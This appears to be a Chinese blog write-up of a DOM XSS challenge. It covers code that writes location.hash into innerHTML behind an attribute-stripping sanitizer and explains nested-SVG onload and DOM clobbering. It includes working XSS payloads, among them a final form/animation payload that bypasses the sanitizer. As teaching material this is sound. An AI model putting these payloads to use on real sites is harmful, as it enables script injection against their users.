XSS-DOM

文章目录

源码

html 复制代码
<script>
 const data = decodeURIComponent(location.hash.substr(1));;
 const root = document.createElement('div');
 root.innerHTML = data;
 
 // 这里模拟了XSS过滤的过程,方法是移除所有属性,sanitizer
 for (let el of root.querySelectorAll('*')) {
  let attrs = [];
  for (let attr of el.attributes) {
   attrs.push(attr.name);
  }
  for (let name of attrs) {
   el.removeAttribute(name);
  }
 }    
  document.body.appendChild(root); 
 
</script>

可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。

当尝试输入弹窗警告代码时,没有反应-在执行前属性被删除了。

SVG标签

HTML树型结构

在文档中的script标签会阻塞DOM的构造。

先注释掉过滤代码,此时正常弹窗

payload:<svg><svg src=1 onload=alert(1)></svg>

最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。

Dom-Clobbring

采用DOM劫持

html 复制代码
    <img id="x">
    <img name="y">
    <script>
        console.log(x);
        console.log(y);
        console.log(document.x);
        console.log(document.y);
        console.log(window.x);
        console.log(window.y);
    </script>

我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。

但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。

tostring

php 复制代码
Object.getOwnPropertyNames(window) 
.filter(p => p.match(/Element$/)) 
.map(p => window[p])  
.filter(p => p && p.prototype && p.prototype.toString !== Object.prototype.toString)

我们可以得到两种标签对象:

HTMLAreaElement ()& HTMLAnchorElement (<a>),利用href属性来进行字符串转换。

html 复制代码
<body>
    <a id="test" href="http://xianoupeng.com">aaa</a>
</body>
<script>
    alert(test)
</script>

引入name属性:

html 复制代码
    <div id=x>
        <a id=y href='www.xianoupeng.com'></a>
    </div>
    <script>
        alert(x.y);
    </script>

使用payload:<style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert(1)"><input id=attributes><input id=attributes>解决最初的问题

相关推荐
北海-cherish2 小时前
vue中的 watchEffect、watchAsyncEffect、watchPostEffect的区别
前端·javascript·vue.js
AALoveTouch3 小时前
网球馆自动预约系统的反调试
javascript·网络
2501_915909063 小时前
HTML5 与 HTTPS,页面能力、必要性、常见问题与实战排查
前端·ios·小程序·https·uni-app·iphone·html5
white-persist4 小时前
Python实例方法与Python类的构造方法全解析
开发语言·前端·python·原型模式
新中地GIS开发老师5 小时前
Cesium 军事标绘入门:用 Cesium-Plot-JS 快速实现标绘功能
前端·javascript·arcgis·cesium·gis开发·地理信息科学
Superxpang5 小时前
前端性能优化
前端·javascript·vue.js·性能优化
左手吻左脸。5 小时前
解决el-select因为弹出层层级问题,不展示下拉选
javascript·vue.js·elementui
李白的故乡5 小时前
el-tree-select名字
javascript·vue.js·ecmascript
Rysxt_5 小时前
Element Plus 入门教程:从零开始构建 Vue 3 界面
前端·javascript·vue.js
隐含5 小时前
对于el-table中自定义表头中添加el-popover会弹出两个的解决方案,分别针对固定列和非固定列来隐藏最后一个浮框。
前端·javascript·vue.js